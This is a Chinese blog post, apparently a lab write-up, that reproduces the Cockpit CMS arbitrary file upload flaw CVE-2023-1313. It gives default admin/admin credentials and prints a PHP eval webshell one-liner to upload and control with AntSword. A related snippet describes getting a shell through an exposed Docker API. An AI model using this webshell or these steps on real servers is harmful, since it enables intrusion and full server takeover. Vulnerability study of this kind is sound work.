cockpit文件上传漏洞(CVE-2023-1313)

于 2024-07-24 14:55:46 发布
阅读量183 收藏
点赞数 2
分类专栏: # 文件上传 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_23003811/article/details/140663047
版权

一、漏洞概述

cockpit在2.4.1版本之前存在任意文件上传漏洞,通过在浏览器中打开/install来运行安装。

二、影响范围

cockpit < 2.4.1

三、访问页面

四、漏洞复现

1、访问/install来运行安装,获得账号密码admin/admin登录

2、制作cmd.php文件,上传php一句话木马。

<?php @eval($_POST['cmd']);?>

3、查看上传的文件路径,点击下载

4、选择下载的文件,右键复制下载连接。

5、使用蚁剑等工具进行连接

风中追风-fzzf
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Cockpit upload文件上传漏洞CVE-2023-1313
0xSec
12-16 1861
Cockpitassetsmanager/upload接口处存在文件上传漏洞,攻击者可通过该漏洞在服务器端任意上传代码,写入后门,获取服务器权限,进而控制整个web服务器。
cockpit 文件上传漏洞CVE-2023-1313
最新发布
zneVue
07-21 209
cockpit在2.4.1版本之前存在任意文件上传漏洞PS:通过在浏览器中打开/install来运行安装。
春秋云镜 CVE-2023-1313(*)
m0_62363483的博客
06-01 342
至于为什么想到把php这三个字去掉,这也是我反复尝试弄出来的,因为我用一句话木马将php这三个字符去掉下载后的文件是空白的,这就形成了对比;我又将phpinfo函数把php去掉结果是一样的。如何我这样上传一句话木马:<?我们上传这个代码:<?跟第一个一样,你用蚁剑连还是不行。我们用蚁剑连接返回是空的。
Goby 漏洞发布|Cockpit 平台 upload 文件上传漏洞CVE-2023-1313
m0_46699477的博客
09-28 844
Cockpit 是一个自托管、灵活且用户友好的无头内容平台,用于创建自定义数字体验。Cockpit 存在文件上传漏洞,攻击者可上传任意文件,进而导致服务器被控制等。
春秋云镜 CVE-2023-1313
qq274575499的博客
04-03 1044
cockpit在2.4.1版本之前存在任意文件上传漏洞PS:通过在浏览器中打开/install来运行安装。
春秋云境CVE-2023-1313
m0_64432806的博客
03-27 713
春秋云境CVE-2023-1313 cockpit在2.4.1版本之前存在任意文件上传漏洞PS:通过在浏览器中打开/install来运行安装
cockpit-docs:基于VuePress的Cockpit CMS的非官方文档
05-15
Cockpit CMS是基于PHP和SQLite或MongoDB和Redis的基于API的通用内容管理系统。 它几乎可以托管在任何支持SQLite扩展并带有PHP的Web空间中。 有关安装信息,请参阅和。 提供技术深入的文档并且还有《。
cockpit-samba-manager:一个用于管理Samba共享和用户的Cockpit插件
04-30
一个Cockpit插件,使管理SMB共享变得容易。 主页 编辑共享 安装 从Github发布 的Ubuntu $ wget ...
cockpit-file-sharing:一个 Cockpit 插件,可轻松管理 samba 和 NFS 文件共享
08-03
一个 Cockpit 插件,可轻松管理 samba 和 NFS 文件共享。 目录 编辑全局设置 集团管理 用户管理 SeDiskOperator权限 NFS 管理器 一般 特征 添加和编辑 Samba 共享 完全控制 Samba 共享参数 使用常用设置自动填充...
Centos7离线安装Cockpit 依赖包(navigator文件管理器)
08-10
Centos7离线安装Cockpit 依赖包(navigator文件管理器) Cockpit(驾驶舱)是一个用于管理和监控 Linux 服务器的 Web 控制台。支持终端操作,以及在线文件管理。 使用教程 ...使用方法: 1.Cockpit离线安装依赖项 ...
SAP-HANA-Cockpit-Installation-Guide-en
06-27
SAP HANA cockpit is the main administration tool for SAP HANA. The SAP HANA cockpit provides tools for the administration and monitoring of SAP HANA databases (databases), and for development ...
春秋云镜 CVE-2023-1313 WP
m0_73649671的博客
04-17 618
春秋云镜 CVE-2023-1313 WP 介绍:cockpit在2.4.1版本之前存在任意文件上传漏洞PS:通过在浏览器中打开/install来运行安装。
JeePlus快速开发平台-validateMobile接口存在SQL注入漏洞_jeeplus快速开发平台 漏洞(1)
2301_77033340的博客
04-15 395
【代码】JeePlus快速开发平台-validateMobile接口存在SQL注入漏洞_jeeplus快速开发平台 漏洞(1)
web渗透测试漏洞复现:docker API未授权漏洞复现并getshell
HACKONE的博客
03-28 301
总结一句话:该命令的作用是在IP为192.168.1.106的远程Docker守护进程上,基于镜像ID为2dc39ba059dc的镜像启动一个新的交互式容器,并挂载主机的根目录到容器内的/mnt目录,然后在新容器中打开一个Bash shell。由于Docker API提供了丰富的功能,它不仅为Docker CLI(命令行界面)提供底层支持,也被许多其他工具和平台广泛采用,如Kubernetes、Docker Compose等,实现了对Docker容器的自动化管理和大规模部署。
主机扫描长亭洞鉴漏洞修复
CandyLove102130的专栏
11-01 539
是一种用于描述API的开源框架,它使用OpenAPI规范来定义API的端点、请求、响应、模式等。Swagger接口泄露漏洞是指在使用Swagger描述API时,由于未正确配置访问控制或未实施安全措施,导致API接口被不授权的人员访问和利用,从而导致系统安全风险。Linux可视化管理工具Cockpit,默认监听9090端口。修复方案1:关闭服务。修复方案2:升级Cockpit安全修复版本。knife4j是一种集成了swagger和。
麒麟服务器漏洞扫描提示端口:9090/tcp/www 不信任的证书
winter1949的专栏
09-23 5177
麒麟服务器漏洞扫描 报SSl证书失效
1day速达软件NET接口处存在RCE漏洞
weixin_43167326的博客
05-07 823
速达软件专注中小企业管理软件,产品涵盖进销存软件,财务软件,ERP软件,CRM系统,项目管理软件,OA系统,仓库管理软件等,是中小企业管理市场的佼佼者,提供产品、技术、服务等信息,百万企业共同选择。速达软件全系产品存在任意文件上传漏洞,未经身份认证得攻击者可以通过此漏洞上传恶意后门文件,执行任意指令,造成服务器失陷。
cockpit-196.3-1.p01 限制用户登录
06-09
对于限制用户登录的问题,你可以使用PAM(Pluggable Authentication Modules)来实现。具体地,你可以通过修改PAM配置文件来限制用户登录。以下是一个例子,演示如何在CentOS 7上限制用户登录: 1. 打开PAM配置文件/etc/pam.d/login ``` sudo vi /etc/pam.d/login ``` 2. 在文件的开头添加以下内容,用于限制用户登录 ``` auth required pam_listfile.so item=user sense=deny file=/etc/login.deny onerr=succeed ``` 3. 创建/etc/login.deny文件,并在文件中添加需要限制登录的用户名 ``` sudo touch /etc/login.deny sudo vi /etc/login.deny ``` 4. 在文件中添加需要限制登录的用户名,每个用户名占一行 ``` user1 user2 ``` 5. 保存文件并退出 6. 重启系统,限制用户登录将会生效 ``` sudo reboot ``` 通过以上步骤,你可以成功地限制用户登录。当用户尝试登录时,如果其用户名在/etc/login.deny中出现,则登录会被拒绝。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值